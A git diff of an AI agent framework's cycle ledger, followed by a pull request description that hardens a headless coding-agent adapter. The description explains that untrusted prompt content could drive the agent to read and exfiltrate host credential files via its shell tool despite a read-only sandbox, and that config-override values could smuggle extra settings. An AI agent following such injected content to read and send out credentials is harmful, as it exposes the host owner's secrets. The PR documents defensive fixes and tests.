@@ -685,7 +685,7 @@
     },
     {
       "id": "cycle-bug-20260428-i637-20ddd6",
-      "label": "Bug Fix \u2014 bridgebuilder-dist-smoke CI lane fails because workflow does not run npm ci (#637)",
+      "label": "Bug Fix — bridgebuilder-dist-smoke CI lane fails because workflow does not run npm ci (#637)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/637",
@@ -698,7 +698,7 @@
     },
     {
       "id": "cycle-095-model-currency",
-      "label": "Model Currency \u2014 gpt-5.5 + Haiku 4.5 + Gemini 3 + cost guardrails",
+      "label": "Model Currency — gpt-5.5 + Haiku 4.5 + Gemini 3 + cost guardrails",
       "status": "archived",
       "created": "2026-04-29T20:30:00Z",
       "prd": "grimoires/loa/prd.md",
@@ -760,7 +760,7 @@
     },
     {
       "id": "cycle-bug-20260502-i669-55150d",
-      "label": "Bug Fix \u2014 post-merge automation: orchestrator scripts ship without an invoking workflow template",
+      "label": "Bug Fix — post-merge automation: orchestrator scripts ship without an invoking workflow template",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/669",
@@ -781,7 +781,7 @@
     },
     {
       "id": "cycle-098-agent-network",
-      "label": "Agent-Network Operation Primitives (L1-L7) \u2014 operator-absent network operation",
+      "label": "Agent-Network Operation Primitives (L1-L7) — operator-absent network operation",
       "status": "archived",
       "created": "2026-05-03T03:02:37.318627Z",
       "prd": "grimoires/loa/prd.md",
@@ -857,13 +857,13 @@
         }
       ],
       "shipped_at": "2026-05-04",
-      "ship_note": "COMPLETE \u2014 L1-L7 all SHIPPED on main. Sprint timeline: Sprint 1 (#693, L1+cross-cutting), 1.5 (#697 hardening), 2 (#705, L2 cost-budget), 3 (#712, L3 scheduled-cycle), H1+H2 (#716, #717 signed-mode + observer), /bug #711 (#718 gpt-review hook), 4 (#764, L4 graduated-trust), 5 (#767, L5 cross-repo-status), 6 (#771, L6 structured-handoff), 7 (#775, L7 soul-identity-doc) + follow-up #778 (L6 inheritance: strict test-mode gate + hook wiring). Cycle-098 cumulative tests on main: 760+. See archive at grimoires/loa/archive/2026-05-08-cycle-098-agent-network-l1-l7-complete/.",
+      "ship_note": "COMPLETE — L1-L7 all SHIPPED on main. Sprint timeline: Sprint 1 (#693, L1+cross-cutting), 1.5 (#697 hardening), 2 (#705, L2 cost-budget), 3 (#712, L3 scheduled-cycle), H1+H2 (#716, #717 signed-mode + observer), /bug #711 (#718 gpt-review hook), 4 (#764, L4 graduated-trust), 5 (#767, L5 cross-repo-status), 6 (#771, L6 structured-handoff), 7 (#775, L7 soul-identity-doc) + follow-up #778 (L6 inheritance: strict test-mode gate + hook wiring). Cycle-098 cumulative tests on main: 760+. See archive at grimoires/loa/archive/2026-05-08-cycle-098-agent-network-l1-l7-complete/.",
       "archived": "2026-05-07T19:11:07Z",
       "archive_path": "grimoires/loa/archive/2026-05-08-cycle-098-agent-network-l1-l7-complete"
     },
     {
       "id": "cycle-bug-20260503-i674-84adf8",
-      "label": "Bug Fix \u2014 post-merge + post-PR pipeline reliability bundle (#674, #634, #633, #676)",
+      "label": "Bug Fix — post-merge + post-PR pipeline reliability bundle (#674, #634, #633, #676)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/674",
@@ -882,7 +882,7 @@
     },
     {
       "id": "cycle-bug-20260504-i636-cb9b6d",
-      "label": "Bug Fix \u2014 T2+T3 hardening bundle (#636+#681+#687+#691+#692)",
+      "label": "Bug Fix — T2+T3 hardening bundle (#636+#681+#687+#691+#692)",
       "type": "bugfix",
       "status": "active",
       "source_issues": [
@@ -966,7 +966,7 @@
     },
     {
       "id": "cycle-bug-20260507-i774-e898cd",
-      "label": "Bug Fix \u2014 Flatline orchestrator drops 3-of-6 model calls on 38KB docs",
+      "label": "Bug Fix — Flatline orchestrator drops 3-of-6 model calls on 38KB docs",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/774",
@@ -979,7 +979,7 @@
     },
     {
       "id": "cycle-bug-20260508-i789-e3f89e",
-      "label": "Bug Fix \u2014 Coupled model-stability rollback restoration (#787 + #789)",
+      "label": "Bug Fix — Coupled model-stability rollback restoration (#787 + #789)",
       "type": "bugfix",
       "status": "active",
       "source_issues": [
@@ -1053,14 +1053,14 @@
           "tasks": 6
         }
       ],
-      "thesis": "Silent degradation is the bug. Every model failure must be (typed \u2192 operator-visible \u2192 graceful-fallback-with-WARN). Rollback is a workaround with a deadline.",
+      "thesis": "Silent degradation is the bug. Every model failure must be (typed → operator-visible → graceful-fallback-with-WARN). Rollback is a workaround with a deadline.",
       "vision_source": "grimoires/loa/visions/entries/vision-019.md",
       "archived": "2026-05-11T09:12:26Z",
       "archive_path": "grimoires/loa/cycles/cycle-102-model-stability/"
     },
     {
       "id": "cycle-103-provider-unification",
-      "label": "Provider Boundary Unification \u2014 collapse 3 HTTP boundaries to cheval substrate",
+      "label": "Provider Boundary Unification — collapse 3 HTTP boundaries to cheval substrate",
       "status": "archived",
       "created": "2026-05-11T09:12:26Z",
       "prd": "grimoires/loa/cycles/cycle-103-provider-unification/prd.md",
@@ -1102,7 +1102,7 @@
     },
     {
       "id": "cycle-104-multi-model-stabilization",
-      "label": "Multi-Model Stabilization \u2014 Within-Company Fallback + Headless Opt-In + BB Internal Dispatcher Unification",
+      "label": "Multi-Model Stabilization — Within-Company Fallback + Headless Opt-In + BB Internal Dispatcher Unification",
       "status": "active",
       "created": "2026-05-12T00:59:16Z",
       "prd": "grimoires/loa/cycles/cycle-104-multi-model-stabilization/prd.md",
@@ -1171,7 +1171,7 @@
     },
     {
       "id": "cycle-106-zone-hygiene",
-      "label": "Framework Template Hygiene \u2014 zone boundaries",
+      "label": "Framework Template Hygiene — zone boundaries",
       "status": "in-progress",
       "created": "2026-05-12T08:10:58Z",
       "prd": "grimoires/loa/cycles/cycle-106-zone-hygiene/prd.md",
@@ -1227,7 +1227,7 @@
     },
     {
       "id": "cycle-108-advisor-strategy",
-      "label": "Advisor-Strategy Benchmark \u2014 Role\u2192Tier Routing for Sustainable Cycles",
+      "label": "Advisor-Strategy Benchmark — Role→Tier Routing for Sustainable Cycles",
       "status": "completed",
       "created": "2026-05-13T00:00:00Z",
       "prd": "grimoires/loa/cycles/cycle-108-advisor-strategy/prd.md",
@@ -1237,7 +1237,7 @@
     },
     {
       "id": "cycle-109-substrate-hardening",
-      "label": "Multi-Model Substrate Hardening \u2014 Capability-Aware Dispatch + Verdict-Quality Envelope + Legacy Sunset",
+      "label": "Multi-Model Substrate Hardening — Capability-Aware Dispatch + Verdict-Quality Envelope + Legacy Sunset",
       "status": "in-progress",
       "created": "2026-05-13T00:00:00Z",
       "prd": "grimoires/loa/cycles/cycle-109-substrate-hardening/prd.md",
@@ -1303,7 +1303,7 @@
     },
     {
       "id": "cycle-bug-20260517-i900-4f7e7a",
-      "label": "Bug Fix \u2014 substrate-health hides primary model failures after fallback success",
+      "label": "Bug Fix — substrate-health hides primary model failures after fallback success",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/900",
@@ -1316,7 +1316,7 @@
     },
     {
       "id": "cycle-112-empirical-model-economy",
-      "label": "Empirical Model Economy (Phase A) \u2014 roll-up + workload tier map seed",
+      "label": "Empirical Model Economy (Phase A) — roll-up + workload tier map seed",
       "type": "feature",
       "status": "archived",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/925",
@@ -1350,7 +1350,7 @@
         }
       ],
       "prd": "grimoires/loa/cycles/cycle-112-empirical-model-economy/prd.md",
-      "phase": "A of 3 (Activate \u2192 Codify \u2192 Optimize)",
+      "phase": "A of 3 (Activate → Codify → Optimize)",
       "sdd": "grimoires/loa/cycles/cycle-112-empirical-model-economy/sdd.md",
       "sprint_plan": "grimoires/loa/cycles/cycle-112-empirical-model-economy/sprint.md",
       "archived": "2026-06-01T06:23:24Z",
@@ -1409,7 +1409,7 @@
     },
     {
       "id": "cycle-bug-20260520-i888-8a4363",
-      "label": "Bug Fix \u2014 cycle-110 auth_type + dispatch_group reject v2/v3 schema validation",
+      "label": "Bug Fix — cycle-110 auth_type + dispatch_group reject v2/v3 schema validation",
       "type": "bugfix",
       "status": "completed",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/888",
@@ -1425,7 +1425,7 @@
     },
     {
       "id": "cycle-bug-20260520-i911-60baf5",
-      "label": "Bug Fix \u2014 butterfreezone-gen + 37 scripts: sha256sum not portable to macOS",
+      "label": "Bug Fix — butterfreezone-gen + 37 scripts: sha256sum not portable to macOS",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/911",
@@ -1438,7 +1438,7 @@
     },
     {
       "id": "cycle-114-harness-modernization-opus-4.8",
-      "label": "Harness Modernization \u2014 Opus 4.8",
+      "label": "Harness Modernization — Opus 4.8",
       "status": "in-progress",
       "created_at": "2026-06-01T03:34:03Z",
       "prd": "grimoires/loa/cycles/cycle-114-harness-modernization-opus-4.8/prd.md",
@@ -1449,7 +1449,7 @@
           "local_id": "sprint-1",
           "global_id": 177,
           "cycle": "cycle-114-harness-modernization-opus-4.8",
-          "theme": "Model substrate \u2014 Opus 4.8 registry + effort threading + deep-reasoning effort frontmatter",
+          "theme": "Model substrate — Opus 4.8 registry + effort threading + deep-reasoning effort frontmatter",
           "fr": "FR-1, FR-2, FR-3",
           "scope": "LARGE",
           "task_count": 3,
@@ -1461,7 +1461,7 @@
           "local_id": "sprint-2",
           "global_id": 178,
           "cycle": "cycle-114-harness-modernization-opus-4.8",
-          "theme": "Gate & safety hardening \u2014 disallowed-tools + stop-guard bg-tasks + rm regex + egress doc",
+          "theme": "Gate & safety hardening — disallowed-tools + stop-guard bg-tasks + rm regex + egress doc",
           "fr": "FR-4, FR-5, FR-6, FR-7",
           "scope": "LARGE",
           "task_count": 4,
@@ -1473,7 +1473,7 @@
           "local_id": "sprint-3",
           "global_id": 179,
           "cycle": "cycle-114-harness-modernization-opus-4.8",
-          "theme": "Economy, recovery UX & ADR \u2014 effort in MODELINV/tier_map + sessionTitle + native-Workflow ADR",
+          "theme": "Economy, recovery UX & ADR — effort in MODELINV/tier_map + sessionTitle + native-Workflow ADR",
           "fr": "FR-8, FR-9, FR-10",
           "scope": "MEDIUM",
           "task_count": 3,
@@ -1484,7 +1484,7 @@
     },
     {
       "id": "cycle-bug-20260610-i992-8fc4da",
-      "label": "Bug Fix \u2014 secret-scanning.yml TruffleHog base==HEAD on push/schedule \u2014 zero scan coverage on main",
+      "label": "Bug Fix — secret-scanning.yml TruffleHog base==HEAD on push/schedule — zero scan coverage on main",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/992",
@@ -1497,7 +1497,7 @@
     },
     {
       "id": "cycle-bug-20260610-i886-b5cddf",
-      "label": "Bug Fix \u2014 bats-tests.yml runs tests/unit/ without installing Python dependencies",
+      "label": "Bug Fix — bats-tests.yml runs tests/unit/ without installing Python dependencies",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/886",
@@ -1510,7 +1510,7 @@
     },
     {
       "id": "cycle-bug-20260610-i989-e8ab1c",
-      "label": "Bug Fix \u2014 Kernel integrity stamp is a hollow PLACEHOLDER \u2014 @loa-managed hash verifies nothing",
+      "label": "Bug Fix — Kernel integrity stamp is a hollow PLACEHOLDER — @loa-managed hash verifies nothing",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/989",
@@ -1523,7 +1523,7 @@
     },
     {
       "id": "cycle-bug-20260610-i991-9c97f1",
-      "label": "Bug Fix \u2014 pre-commit beads hook fails in linked git worktrees: br sync runs from worktree CWD",
+      "label": "Bug Fix — pre-commit beads hook fails in linked git worktrees: br sync runs from worktree CWD",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/991",
@@ -1536,7 +1536,7 @@
     },
     {
       "id": "cycle-bug-20260610-i986-b28220",
-      "label": "Bug Fix \u2014 post-merge.yml fails on submodule mounts with gitignored .claude symlinks (exit-127/chmod)",
+      "label": "Bug Fix — post-merge.yml fails on submodule mounts with gitignored .claude symlinks (exit-127/chmod)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/986",
@@ -1549,7 +1549,7 @@
     },
     {
       "id": "cycle-bug-20260611-i968-d2db26",
-      "label": "Bug Fix \u2014 Submodule-mode update path incomplete: /update-loa lacks submodule routing; --reconcile skips the #842 COPY set",
+      "label": "Bug Fix — Submodule-mode update path incomplete: /update-loa lacks submodule routing; --reconcile skips the #842 COPY set",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/968",
@@ -1562,7 +1562,7 @@
     },
     {
       "id": "cycle-bug-20260611-i805-732c34",
-      "label": "Bug Fix \u2014 bridgebuilder entry.sh crashes module-not-found (zod) on fresh submodule mounts \u2014 #805 residual F7",
+      "label": "Bug Fix — bridgebuilder entry.sh crashes module-not-found (zod) on fresh submodule mounts — #805 residual F7",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/805",
@@ -1575,7 +1575,7 @@
     },
     {
       "id": "cycle-bug-20260611-i984-8b8a94",
-      "label": "Bug Fix \u2014 red-team-code-vs-design.sh silently passes quality gate on degraded runs \u2014 #984 + #985",
+      "label": "Bug Fix — red-team-code-vs-design.sh silently passes quality gate on degraded runs — #984 + #985",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/984",
@@ -1588,7 +1588,7 @@
     },
     {
       "id": "cycle-bug-20260611-i809-0cef92",
-      "label": "Bug Fix \u2014 adversarial-review status:clean qualifier + stale #774 warning + missing --phase attribution",
+      "label": "Bug Fix — adversarial-review status:clean qualifier + stale #774 warning + missing --phase attribution",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/809",
@@ -1601,7 +1601,7 @@
     },
     {
       "id": "cycle-bug-20260611-i982-cc9459",
-      "label": "Bug Fix \u2014 cheval headless adapters: process-group kill on completion-path timeout (issue #982)",
+      "label": "Bug Fix — cheval headless adapters: process-group kill on completion-path timeout (issue #982)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/982",
@@ -1614,7 +1614,7 @@
     },
     {
       "id": "cycle-bug-20260611-i979-afeb52",
-      "label": "Bug Fix \u2014 cheval auth_type/dispatch_group inference for custom .loa.config.yaml headless providers (#979)",
+      "label": "Bug Fix — cheval auth_type/dispatch_group inference for custom .loa.config.yaml headless providers (#979)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/979",
@@ -1627,7 +1627,7 @@
     },
     {
       "id": "cycle-bug-20260611-i978-17e08f",
-      "label": "Bug Fix \u2014 flatline: mktemp templates do not expand on BSD/macOS \u2014 literal-XXXXXX temp files + cross-run collisions degrade 3-voice review",
+      "label": "Bug Fix — flatline: mktemp templates do not expand on BSD/macOS — literal-XXXXXX temp files + cross-run collisions degrade 3-voice review",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/978",
@@ -1640,7 +1640,7 @@
     },
     {
       "id": "cycle-bug-20260612-i1002-bebe8a",
-      "label": "Bug Fix \u2014 Framework ships duplicate hook entries + unwired safety/compliance gates",
+      "label": "Bug Fix — Framework ships duplicate hook entries + unwired safety/compliance gates",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/1002",
@@ -1653,7 +1653,7 @@
     },
     {
       "id": "cycle-bug-20260612-i1004-850c0b",
-      "label": "Bug Fix \u2014 BB skip stamps the reviewed-marker, making bridgebuilder:self-review unreachable without API surgery",
+      "label": "Bug Fix — BB skip stamps the reviewed-marker, making bridgebuilder:self-review unreachable without API surgery",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/1004",
@@ -1666,7 +1666,7 @@
     },
     {
       "id": "cycle-bug-20260612-i1011-50143a",
-      "label": "Bug Fix \u2014 port #983 salvage into run_subprocess_pgkill: pre-encode stdin + killpg PermissionError fallback + TimeoutExpired partial output",
+      "label": "Bug Fix — port #983 salvage into run_subprocess_pgkill: pre-encode stdin + killpg PermissionError fallback + TimeoutExpired partial output",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/1011",
@@ -1679,7 +1679,7 @@
     },
     {
       "id": "cycle-bug-20260612-1fd0bf",
-      "label": "Bug Fix \u2014 L7 SOUL.md validator crashes with TypeError on unquoted YAML dates",
+      "label": "Bug Fix — L7 SOUL.md validator crashes with TypeError on unquoted YAML dates",
       "type": "bugfix",
       "status": "active",
       "source_issue": null,
@@ -1692,7 +1692,7 @@
     },
     {
       "id": "cycle-bug-20260612-i745-731985",
-      "label": "Bug Fix \u2014 semver-bump.sh rejects SemVer 2.0 pre-release versions (regex too strict)",
+      "label": "Bug Fix — semver-bump.sh rejects SemVer 2.0 pre-release versions (regex too strict)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/745",
@@ -1705,7 +1705,7 @@
     },
     {
       "id": "cycle-bug-20260612-i980-6cfd2b",
-      "label": "Bug Fix \u2014 Golden-path silently mis-detects workflow phase when path-lib init fails",
+      "label": "Bug Fix — Golden-path silently mis-detects workflow phase when path-lib init fails",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/980",
@@ -1718,7 +1718,7 @@
     },
     {
       "id": "cycle-bug-20260612-75116b",
-      "label": "Bug Fix \u2014 Constructs install falls through to dead registry instead of local GitHub SoT",
+      "label": "Bug Fix — Constructs install falls through to dead registry instead of local GitHub SoT",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa-constructs/issues/253",
@@ -1731,7 +1731,7 @@
     },
     {
       "id": "cycle-bug-20260612-ca7070",
-      "label": "Bug Fix \u2014 find_local_source is slug-blind for configured paths",
+      "label": "Bug Fix — find_local_source is slug-blind for configured paths",
       "type": "bugfix",
       "status": "active",
       "source_issue": null,
@@ -1745,7 +1745,7 @@
     },
     {
       "id": "cycle-bug-20260613-i1025-9a0abc",
-      "label": "Bug Fix \u2014 Output-swallowing jq shape silently converts parse errors into clean gate verdicts (KF-004/KF-015 mechanism)",
+      "label": "Bug Fix — Output-swallowing jq shape silently converts parse errors into clean gate verdicts (KF-004/KF-015 mechanism)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/1025",
@@ -1758,7 +1758,7 @@
     },
     {
       "id": "cycle-bug-20260613-i966-01593f",
-      "label": "Bug Fix \u2014 PR #966 cursor-headless adapter config-dead/misdispatched on post-Bundle-E main",
+      "label": "Bug Fix — PR #966 cursor-headless adapter config-dead/misdispatched on post-Bundle-E main",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/pull/966",
@@ -1771,7 +1771,7 @@
     },
     {
       "id": "cycle-bug-20260613-i1025-004d22",
-      "label": "Bug Fix \u2014 #1025 sweep leg 2: swallowed-jq sites in post-pr-triage.sh + red-team-retention.sh",
+      "label": "Bug Fix — #1025 sweep leg 2: swallowed-jq sites in post-pr-triage.sh + red-team-retention.sh",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/1025",
@@ -1784,7 +1784,7 @@
     },
     {
       "id": "cycle-bug-20260613-i937-ddbd73",
-      "label": "Bug Fix \u2014 delete dead loa_cheval.chunking package (#937 false-closure)",
+      "label": "Bug Fix — delete dead loa_cheval.chunking package (#937 false-closure)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/937",
@@ -1794,9 +1794,22 @@
       ],
       "triage": "grimoires/loa/a2a/bug-20260613-i937-ddbd73/triage.md",
       "sprint_plan": "grimoires/loa/a2a/bug-20260613-i937-ddbd73/sprint.md"
+    },
+    {
+      "id": "cycle-bug-20260613-i1008-8d489a",
+      "label": "Bug Fix — codex-headless tool-surface / config-allowlist / stderr-redaction hardening",
+      "type": "bugfix",
+      "status": "active",
+      "source_issue": "https://github.com/0xHoneyJar/loa/issues/1008",
+      "created_at": "2026-06-13T07:30:54Z",
+      "sprints": [
+        "sprint-bug-214"
+      ],
+      "triage": "grimoires/loa/a2a/bug-20260613-i1008-8d489a/triage.md",
+      "sprint_plan": "grimoires/loa/a2a/bug-20260613-i1008-8d489a/sprint.md"
     }
   ],
-  "global_sprint_counter": 213,
+  "global_sprint_counter": 214,
   "bugfix_cycles": [
     {
       "id": "cycle-bug-20260418-i554-00a529",
@@ -1859,7 +1872,7 @@
     },
     {
       "id": "cycle-bug-20260502-i668-3b9765",
-      "label": "Bug Fix \u2014 Post-merge classifier silently classifies cycle PRs as other (#668)",
+      "label": "Bug Fix — Post-merge classifier silently classifies cycle PRs as other (#668)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/668",
@@ -1872,7 +1885,7 @@
     },
     {
       "id": "cycle-bug-20260502-i665-3962d9",
-      "label": "Bug Fix \u2014 post-pr Bridgebuilder MEDIUMs auto-triage to log_only without operator visibility (#665)",
+      "label": "Bug Fix — post-pr Bridgebuilder MEDIUMs auto-triage to log_only without operator visibility (#665)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/665",
@@ -1885,7 +1898,7 @@
     },
     {
       "id": "cycle-bug-20260502-i664-653da7",
-      "label": "Bug Fix \u2014 post-pr-state.sh update-phase rejects bridgebuilder_review (#664)",
+      "label": "Bug Fix — post-pr-state.sh update-phase rejects bridgebuilder_review (#664)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/664",
@@ -1898,7 +1911,7 @@
     },
     {
       "id": "cycle-bug-20260502-i663-ec337e",
-      "label": "Bug Fix \u2014 post-pr-orchestrator passes invalid --phase pr to flatline-orchestrator (#663)",
+      "label": "Bug Fix — post-pr-orchestrator passes invalid --phase pr to flatline-orchestrator (#663)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/663",
@@ -1911,7 +1924,7 @@
     },
     {
       "id": "cycle-bug-20260502-i661-cd5f4f",
-      "label": "Bug Fix \u2014 Defensive diagnostic for beads_rust 0.2.1 migration error (#661)",
+      "label": "Bug Fix — Defensive diagnostic for beads_rust 0.2.1 migration error (#661)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/661",
@@ -1924,7 +1937,7 @@
     },
     {
       "id": "cycle-bug-20260502-i660-dd4514",
-      "label": "Bug Fix \u2014 mount-submodule.sh BSD realpath portability + silent reconcile exit (#660)",
+      "label": "Bug Fix — mount-submodule.sh BSD realpath portability + silent reconcile exit (#660)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/660",
@@ -1937,7 +1950,7 @@
     },
     {
       "id": "cycle-bug-20260503-i675-ceb96f",
-      "label": "Bug Fix \u2014 model-adapter large-payload hardening (cheval/httpx HTTP/2 disconnect on 137KB+ payloads, Anthropic 60s timeout, #675)",
+      "label": "Bug Fix — model-adapter large-payload hardening (cheval/httpx HTTP/2 disconnect on 137KB+ payloads, Anthropic 60s timeout, #675)",
       "type": "bugfix",
       "status": "completed",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/675",
@@ -1953,7 +1966,7 @@
     },
     {
       "id": "cycle-bug-20260503-i697-475b02",
-      "label": "Bug Fix \u2014 post-merge automation: gt_regen arg mismatch + CHANGELOG cross-scope leak (#697)",
+      "label": "Bug Fix — post-merge automation: gt_regen arg mismatch + CHANGELOG cross-scope leak (#697)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/697",
@@ -1966,7 +1979,7 @@
     },
     {
       "id": "cycle-bug-20260516-i921-e386d6",
-      "label": "Bug Fix \u2014 KF-010 root cause: deriveTimeoutMs reasoning-class predicate is OpenAI-only (#921)",
+      "label": "Bug Fix — KF-010 root cause: deriveTimeoutMs reasoning-class predicate is OpenAI-only (#921)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/921",
@@ -1979,7 +1992,7 @@
     },
     {
       "id": "cycle-bug-20260520-i894-cdaf96",
-      "label": "Bug Fix \u2014 cheval headless CLI env-scrub misses GENAI auth-mode selectors (#894)",
+      "label": "Bug Fix — cheval headless CLI env-scrub misses GENAI auth-mode selectors (#894)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/894",
@@ -1992,7 +2005,7 @@
     },
     {
       "id": "cycle-bug-20260601-i971-727e7f",
-      "label": "Bug Fix \u2014 classify-pr-type.sh rule #2 case-sensitive (Cycle-NNN misroute, #971)",
+      "label": "Bug Fix — classify-pr-type.sh rule #2 case-sensitive (Cycle-NNN misroute, #971)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/971",
@@ -2005,7 +2018,7 @@
     },
     {
       "id": "cycle-bug-20260610-i942-0f917b",
-      "label": "Bug Fix \u2014 next-bug-sprint-id.sh emits colliding sprint ids (ignores ledger cycles[].sprints, #942)",
+      "label": "Bug Fix — next-bug-sprint-id.sh emits colliding sprint ids (ignores ledger cycles[].sprints, #942)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/942",
@@ -2018,7 +2031,7 @@
     },
     {
       "id": "cycle-bug-20260613-i1043-2ee50c",
-      "label": "Bug Fix \u2014 default permission allow-list doesn't encode the Three-Zone Model's State-Zone write-freedom (#1043)",
+      "label": "Bug Fix — default permission allow-list doesn't encode the Three-Zone Model's State-Zone write-freedom (#1043)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/1043",
@@ -2031,7 +2044,7 @@
     },
     {
       "id": "cycle-bug-20260613-i1044-8f8c49",
-      "label": "Bug Fix \u2014 State-Zone executable/lifecycle surfaces frictionlessly writable (.run/cron.d, .run/*.sh, grimoires/loa/skills) (#1044)",
+      "label": "Bug Fix — State-Zone executable/lifecycle surfaces frictionlessly writable (.run/cron.d, .run/*.sh, grimoires/loa/skills) (#1044)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/1044",
@@ -2046,7 +2059,7 @@
   "bugfixes": [
     {
       "id": "cycle-bug-20260428-i640-1cc190",
-      "label": "Bug Fix \u2014 /mount writes stale framework_version: 0.6.0 (THIRD recurrence #640)",
+      "label": "Bug Fix — /mount writes stale framework_version: 0.6.0 (THIRD recurrence #640)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/640",


### PR DESCRIPTION
## Summary

Closes the three pre-existing security gaps in `codex_headless_adapter.py` (origin PR #727), audit-recovered from the sprint-bug-196 sidecar (KF-004 class). Fixes **#1008**.

| # | Finding | Fix |
|---|---------|-----|
| 1 | **HIGH** — agent read-surface: untrusted prompt content could drive the codex agent to read + exfiltrate host files (`~/.codex/auth.json`) via its shell tool despite `--sandbox read-only` | **Fixed at root**: disable the agent tool surface (`--disable shell_tool/browser_use/browser_use_external/computer_use`) → adapter is **non-agentic** for its pure-inference use. Empty-cwd (`-C`) + read-only retained as defense-in-depth. |
| 2 | **HIGH** — `codex_config_overrides` arbitrary `-c key=value` passthrough could alter security posture | Default-deny key allowlist (`_ALLOWED_CONFIG_OVERRIDE_KEYS`) + value-charset guard (`_SAFE_OVERRIDE_VALUE_RE`) so an allowlisted key's value cannot smuggle a second `-c` assignment. |
| 3 | **MEDIUM** — raw codex stderr reflected into exceptions could leak prompt fragments/paths/account tokens | Route through `sanitize_provider_error_message` (cycle-103 T3.3), redacting before the length cap in both branches. |

Plus a review-surfaced fix: workspace created inside `try`, `mkdtemp` failure → typed `ProviderUnavailableError`, guarded cleanup (no tempdir leak).

## Why tool-disabling (not just empty-cwd)

The cross-model audit flagged that `--sandbox read-only` is **no-write, not read-confined**. Verified empirically against codex 0.137.0: read-only uses bubblewrap and gives a read-everything view on standard hosts, so empty-cwd alone doesn't stop absolute-path reads. `codex features list` exposes `shell_tool` as disable-able; a live run with the tool surface disabled produced **zero `command_execution` events** and could not read a canary, while pure-inference text still returned — the "deny-all tool flag" the original Finding 1 named.

## Gated pipeline

`/bug` → `/implement` → `/review-sprint` (**All good**) → `/audit-sprint` (**APPROVED - LETS FUCKING GO**).

- Cross-model dissent: 1 review pass + 3 audit passes (gpt-5.5-pro, non-degraded).
- **KF-004 sidecar recovery** at every clean verdict: recovered + fixed 2 HIGH that the canonical verdict reported as 0/APPROVED — value-injection (audit-1) and read-exfil (audit-2). Audit-3 clean.

## Tests

- codex adapter suite: **50 passed / 1 skipped** (gated live test), up from 34/1; every fix has a failing-first test.
- Full adapter suite: **1719 passed**; the only failures are 4 pre-existing `test_flatline_routing.py` cases (proven on clean `main` HEAD via worktree — unrelated to this change).

## Follow-up

- **#1048** — `cursor_headless` (#966) has the same read-exfil exposure and does NOT disable its tool surface; plus a shared FS-isolation defense-in-depth primitive.

## Notes

System-Zone path `.claude/adapters/**` is UNCLASSIFIED→editable (cheval Python). `grimoires/loa/a2a/**` artifacts (triage, reviewer, feedback, COMPLETED) are gitignored/local — this PR is code + ledger only.

